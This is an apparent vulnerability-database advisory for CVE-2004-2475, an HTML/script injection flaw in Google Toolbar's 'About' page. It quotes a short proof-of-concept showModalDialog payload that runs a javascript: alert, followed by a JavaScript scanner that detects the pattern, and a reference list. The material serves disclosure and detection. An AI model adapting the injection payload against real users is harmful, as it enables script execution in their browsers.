Google Toolbar 'About' Cross-Site Scripting Vulnerability

Vulnerability ID: 1108177
Vulnerability type: Input validation
Published: 2004-09-17
Updated: 2005-10-20
CVE ID: CVE-2004-2475
CNNVD-ID: CNNVD-200412-1194
Platform: Windows
CVSS score: 4.3
|Vulnerability Source
https://www.exploit-db.com/exploits/24607
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1194
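|Vulnerability Details
Google Toolbar is a toolbar integrated into IE that makes searching convenient for users. Google Toolbar has an input validation issue that a remote attacker can exploit to carry out cross-site scripting attacks and obtain sensitive user information. The toolbar's 'About' section does not properly filter HTML code: a user can build an HTML page that, when loaded by a target user, invokes the 'About' page and executes arbitrary script code in the context of that page.
|Exploit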
source: http://www.securityfocus.com/bid/11210/info

Google Toolbar is reported prone to an HTML injection vulnerability. It is reported that the Google Toolbar 'ABOUT.HTML' page allows the injection of HTML and JavaScript code.

This vulnerability may allow an attacker to inject malicious HTML and script code into the about page of the vulnerable application.

<s c r i p t>
window.showModalDialog("res://C:\Program%20Files\Google\GoogleToolbar1.dll/ABOUT.HTML",
"<div style="background-image:
url(javascript:alert(location.href));">");
</s c r i p t>
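
For detection, the pattern above reduces to a showModalDialog() call that targets a res:// resource and passes HTML or a script URL as the dialog argument. The scanner below is an added example, not code from the advisory or from Google; the function names, the verdict labels and the example.dll call are assumptions made for illustration.

```javascript
// Constructed sample: the proof-of-concept text from this page, kept verbatim
// (including its spaced-out script tag), plus two harmless calls for contrast.
const POC = String.raw`<s c r i p t>
window.showModalDialog("res://C:\Program%20Files\Google\GoogleToolbar1.dll/ABOUT.HTML",
"<div style="background-image:
url(javascript:alert(location.href));">");
</s c r i p t>`;
const BENIGN = `window.showModalDialog("help.html", "hello");
window.showModalDialog("res://example.dll/info.htm", "plain text");`;

// Split res://<module>/<resource> into its parts (hypothetical helper).
function parseResUrl(url) {
  const m = /^res:\/\/(.+?\.(?:dll|exe))\/(.*)$/i.exec(url);
  const cut = url.lastIndexOf("/");
  let module = m ? m[1] : url.slice(6, cut);
  const resource = m ? m[2] : url.slice(cut + 1);
  try { module = decodeURIComponent(module); } catch (e) { /* keep raw text */ }
  return { module, resource };
}

// Report every showModalDialog() call whose target is a res:// resource and
// classify the dialog arguments that follow it.
function findResDialogCalls(source) {
  const call = /showModalDialog\s*\(\s*(["'])(res:\/\/[^"']+)\1\s*,?/gi;
  const findings = [];
  let m;
  while ((m = call.exec(source)) !== null) {
    // Arguments run to the end of the statement or script block. Quoting in
    // hostile pages is often broken, so string literals are not parsed.
    const rest = source.slice(call.lastIndex);
    const end = rest.search(/\)\s*;?\s*(\r?\n|$)|<\/\s*s/i);
    const args = end === -1 ? rest : rest.slice(0, end);
    const markup = /<\s*[a-z!\/]/i.test(args);
    const scriptUrl = /\b(?:javascript|vbscript)\s*:/i.test(args);
    findings.push({
      ...parseResUrl(m[2]), markup, scriptUrl,
      verdict: markup || scriptUrl ? "block" : "review",
    });
  }
  return findings;
}

console.log(findResDialogCalls(POC + "\n" + BENIGN));
```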
|References

Source: XF
Name: google-toolbar-about-code-execution (17435)
Link: http://xforce.iss.net/xforce/xfdb/17435
Source: BID
Name: 11210
Link: http://www.securityfocus.com/bid/11210
Source: OSVDB
Name: 10037
Link: http://www.osvdb.org/10037
Source: SECTRACK
Name: 1011351
Link: http://securitytracker.com/id?1011351
Source: FULLDISC
Name: 20040918 Re: Google Toolbar: About – Allows Script Injection
Link: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0639.html
Source: FULLDISC
Name: 20040918 Re: Google Toolbar: About – Allows Script Injection
Link: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0629.html
Source: BUGTRAQ
Name: 20040917 Google Toolbar: About – Allows Script Injection
Link: http://archives.neohapsis.com/archives/bugtraq/2004-09/0226.html
Source: NSFOCUS
Name: 6907
Link: http://www.nsfocus.net/vulndb/6907